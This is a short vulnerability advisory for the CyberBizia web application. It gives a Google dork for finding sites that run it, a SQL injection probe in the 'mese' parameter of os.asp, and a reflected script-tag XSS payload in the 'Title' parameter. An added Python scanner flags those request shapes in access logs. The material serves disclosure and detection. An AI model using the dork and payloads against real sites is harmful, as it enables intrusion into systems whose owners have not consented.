CyberBizia Multiple Vulnerabilities

2013.08.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#********************************************************************************
# Exploit Title  : CyberBizia Multiple Vulnerabilities
# Software link  : http://www.cyberbizia.com
# Exploit Author : Ashiyane Digital Security Team
# Tested on      : Windows 7, Linux
# Google Dork    : intext:"Powered by CyberBizia"
# Date           : 2013/08/29
#--------------------------------------------------------------------
# Exploit 1 : SQL Injection
# Location  : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]
# Proof:
# [Target]/myasg/os.asp?elenca=mese&mese=1'
#--------------------------------------------------------------------
# Exploit 2 : Cross-Site Scripting (XSS)
# Location  : [Target]/?Title=[xss]
# Proof:
# [Target]/?Title="/><script>alert(1);</script>
###################### discovered by : ACC3SS ######################
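
An added example, not part of the original advisory: a Python check that flags the two request shapes listed above when they appear in web access logs. The simplified log format, the sample lines, and the assumption that mese (Italian for "month") is always a one- or two-digit number are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: "mese" (Italian for "month") is only ever a 1-2 digit number.
MESE_OK = re.compile(r"\d{1,2}")
# Characters that let a reflected Title value break out of HTML markup.
MARKUP = re.compile(r'[<>"]')

# Constructed sample lines in a simplified "client method target status" format.
SAMPLE_LOG = """\
192.0.2.10 GET /myasg/os.asp?elenca=mese&mese=8 200
198.51.100.7 GET /myasg/os.asp?elenca=mese&mese=1' 500
198.51.100.7 GET /?Title=%22/%3E%3Cscript%3Ealert(1);%3C/script%3E 200
192.0.2.10 GET /?Title=Contatti 200
"""

def classify(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    params = {}
    # parse_qs percent-decodes values; names are compared case-insensitively.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        params.setdefault(name.lower(), []).extend(values)
    findings = []
    if parts.path.lower().endswith("/myasg/os.asp"):
        if any(not MESE_OK.fullmatch(v) for v in params.get("mese", [])):
            findings.append("sqli-probe:mese")
    if any(MARKUP.search(v) for v in params.get("title", [])):
        findings.append("xss-probe:Title")
    return findings

def scan(log_text):
    """Return (client, finding, target) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # not in the assumed format
        client, _method, target, _status = fields
        hits.extend((client, f, target) for f in classify(target))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The same two predicates (numeric-only mese, no markup characters in Title) can be enforced as request filtering in front of the application until the code itself uses parameterized queries and output encoding.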

